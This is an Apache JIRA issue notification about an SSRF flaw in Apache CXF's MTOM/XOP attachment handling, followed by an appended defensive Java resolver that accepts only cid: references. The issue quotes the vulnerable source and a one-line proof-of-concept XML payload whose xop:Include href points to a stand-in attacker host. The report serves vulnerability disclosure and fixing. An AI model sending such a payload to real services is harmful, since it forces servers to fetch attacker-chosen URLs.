[ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17650941#comment-17650941 ]
Chunqing Lin commented on CXF-8706:
-----------------------------------

[~bergers], this is not limited to MTOM; basically it is part of the XML parser flow, so as long as the JAXBAttachmentUnmarshaller is being used, regardless of whether MTOM is enabled or not, or maybe even when it is a JAX-RS call, it will trigger this issue.

[~reta], I am glad this is fixed. I looked at the Pull Request and all looks good to me. Did this prompt the new CVE-2022-46364: Apache CXF SSRF Vulnerability? In the future, is there any better channel than this public Jira to report such a vulnerability? I have been kind of worried in the last few months that this information is publicly available. Thanks in advance.

> CXF MTOM handler allows content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with a SOAP web service or JAXRS web service with MTOM enabled,
> the Unmarshaller allows the XOP Include tag to have href attributes that allow any
> protocol. According to the W3C MTOM spec, only "cid:" should be allowed for the
> href scheme.
>
> The affected call stack is:
>
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
>     MTOMDecorator.startElement(TagName) line: 70
>
> The source code is:
>
>     public static DataSource getAttachmentDataSource(String contentId,
>                                                      Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4),
>                                               StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else { // should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>
> The exploit can send a payload containing:
>
>     <stringvalue><inc:Include href="http://attackers.site/exploit/payload"
>     xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
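As an added example, not CXF's own fix from the linked pull request, the Java below shows the defensive counterpart of the quoted `getAttachmentDataSource`: only the `cid:` scheme is accepted, the Content-ID is URL-decoded and looked up in the message's own attachments, and every other href (including the `http://` one in the report and the scheme-less fallback the original code still honoured) is rejected rather than fetched. The `Map<String, byte[]>` attachment store and the `XopHrefResolver` and `InvalidXopHrefException` names are assumptions standing in for CXF's `Collection<Attachment>` and `Fault`; it needs Java 10 or later for `URLDecoder.decode(String, Charset)`.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Map;

// Added example, not CXF code: resolve an xop:Include href the way the report
// says the MTOM spec intends, i.e. cid: only, never through URLDataSource.
public final class XopHrefResolver {

    // Hypothetical stand-in for CXF's Fault; raised for any non-cid: href.
    public static final class InvalidXopHrefException extends RuntimeException {
        InvalidXopHrefException(String msg) { super(msg); }
    }

    // attachments: hypothetical stand-in for Collection<Attachment>,
    // keyed by Content-ID without the surrounding angle brackets.
    public static byte[] resolve(String href, Map<String, byte[]> attachments) {
        // Scheme names are case-insensitive, so "CID:" is accepted as well.
        if (href == null || !href.regionMatches(true, 0, "cid:", 0, 4)) {
            // No fallback for bare names or other schemes: rejecting here is
            // what removes the outbound request the original else-branch made.
            throw new InvalidXopHrefException(
                "xop:Include href must use the cid: scheme, got: " + href);
        }
        // cid: values carry a URL-encoded Content-ID (RFC 2392); decode first.
        String contentId = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        // A decoded Content-ID must be a plain identifier, never a URL.
        if (contentId.isEmpty() || contentId.contains("://")) {
            throw new InvalidXopHrefException("Malformed Content-ID: " + contentId);
        }
        byte[] body = attachments.get(contentId);
        if (body == null) {
            throw new InvalidXopHrefException("No attachment with Content-ID " + contentId);
        }
        return body;
    }

    public static void main(String[] args) {
        // Constructed sample: one MIME part with Content-ID <part1@example.org>.
        Map<String, byte[]> atts =
            Map.of("part1@example.org", "hello".getBytes(StandardCharsets.UTF_8));
        System.out.println(new String(resolve("cid:part1%40example.org", atts),
                                      StandardCharsets.UTF_8));
        String[] bad = {"http://attackers.site/exploit/payload",
                        "file:///etc/hostname", "part1@example.org"};
        for (String h : bad) {
            try { resolve(h, atts); }
            catch (InvalidXopHrefException e) { System.out.println("rejected: " + e.getMessage()); }
        }
    }
}
```

Running `main` prints `hello` for the valid `cid:` reference and one `rejected:` line for each of the three other hrefs; a request to the external host never leaves the process.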